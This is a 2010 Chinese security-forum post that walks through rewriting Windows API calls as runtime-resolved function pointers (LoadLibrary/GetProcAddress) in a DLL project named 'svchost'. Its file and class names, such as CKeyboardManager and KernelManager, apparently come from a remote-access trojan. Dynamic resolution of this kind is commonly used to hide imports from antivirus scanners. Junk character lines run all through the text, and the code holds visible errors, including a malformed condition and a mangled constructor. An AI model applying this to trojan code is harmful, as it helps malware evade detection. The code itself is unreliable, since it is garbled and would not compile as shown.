标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
# }: W* x$ e0 R8 D. o5 r, n0 l4 O
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
5 c( O& f/ Z ~8 f
----------------------------------------
8 f, a1 ^' J& E
DTDY.h:
: D7 P1 k* R8 V7 H& b5 _2 P
/ J0 ~- n4 F! R) E" ?
#if _MSC_VER>1000
5 M3 o3 P! x8 ~( q# c) a
#pragma once
. M4 o; c. D. X
#endif //_MSC_VER>1000
$ r' S* z' T& e U+ E) U
#include<windows.h>
) s+ ]2 X# u; \$ G' q p
9 f4 v4 ^5 m7 j/ C$ V
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
1 ]9 Y, S+ y2 n- ?
class DTDY
% T/ M. p. s# f. R) I+ r, s
{
$ R5 A2 h" T4 j
public:
+ h4 ~7 n6 m+ i4 ]! _5 m( q
DTDY();
8 X7 ? n! @5 L3 h7 C$ O$ `
virtual ~DTDY();
3 R! d" E- |8 [5 |1 K% V
public:
; }$ N# X9 _# X! i. l- E+ K- Q
static pGetModuleFileNameA MyGetModuleFileName;
& R1 j/ V/ {% t7 E: w& P) e
static BOOL FunInitiallization();
6 _ @' X# i* j+ r3 [* e) d
};
" H; a& L4 H G" {( R
#endif
7 {) F) v/ j2 S7 w) ~+ i
----------------------------------------
- o Y' a8 M$ }
! S* N1 }, e$ ^
DTDY.cpp:
0 ] H+ U+ B; e/ h' v6 |1 j
5 q' a8 {8 {, L( D( a8 @
#include "DTDY.h"
, s& P- {# N: v* i% v: A7 q
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
^$ {* E# p) G
DTDY:TDY()
, O- x/ ^9 w; L9 |, H
{
* t7 V4 Z- x( o2 }, q+ b2 ~
}
) c( y& v4 e7 Y2 t$ ~. i- m
DTDY::~DTDY()
5 W' T$ Y( T7 |1 Q' ^* |; L# J$ r
{
' i2 G2 y& w) y: s
}
7 \/ p" S0 X, m4 t' b4 A" z% n _
BOOL DTDY::FunInitiallization()
8 Z$ x# s' {3 D4 S5 r, F
{
4 c2 `" H9 ^% Q
HMODULE hModule=LoadLibrary("kernel32.dll");
3 u$ Q2 b$ i$ K. \
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
! o$ N" A0 X# L) Z
if(!MyGetModuleFileName=) return FALSE;
[4 I" y8 q4 i l
' j3 G1 b" J6 U& }% ]0 Z' K* ]
return TRUE;
. G/ D6 V) [1 Y
}
1 H3 I2 u7 Y2 q/ @ {) n3 ]
----------------------------------------
{* J6 _: X8 E% g
svchost.cpp:
/ J$ O+ m. n6 ]1 g
+ D4 B# J# O" S! c5 G2 }! _* c+ u
#include "DTDY.h"
* ?- x6 Z$ U+ D/ \: }0 u
& X" Y4 o4 i- Y# W' t7 P
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
) O1 a( k8 ?! ?" z& G
{
& g; k4 Z" v7 t3 M; f
switch(ul_reason_for_call)
0 }% A! v6 V C% r$ P" n
{
# `* z+ A% G- F! v e" E
case DLL_PROCESS_ATTACH:
9 @# z+ m3 A8 g2 v/ q6 ~5 G
if(!DTDY::FunInitiallization()) return FALSE;
& V$ }6 b! [$ u; I- n
) |6 P/ ~$ g2 G9 Q7 T
break;
: F! w* i, j& f# ~; ?2 \- o* B
}
- B3 N5 I" f; e5 e
}
0 y# S/ Q7 d. \( ]( h9 ?1 L
5 A8 |0 `5 j* }8 a2 p# j; P. o7 h
0 y" U* t4 ~: I* o9 P( M
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
3 l2 D; N! o' k
改写为
% }: t* l+ l. e
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
0 k/ E8 t, k$ m7 [1 k
----------------------------------------
0 a c0 V, [1 \6 d
KernelManager.cpp:
- G+ `" K% [; j7 T7 \8 d
0 ?& Q0 m9 z% R4 {/ z3 q3 v3 k
#include "../DTDY.h"
( C6 g# P, f% ~
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
; P3 [1 L0 W0 h6 O2 n2 L$ V; l
改写为
$ R% c2 Q# R. c2 ?
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
8 u0 W$ \- z# h% }
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
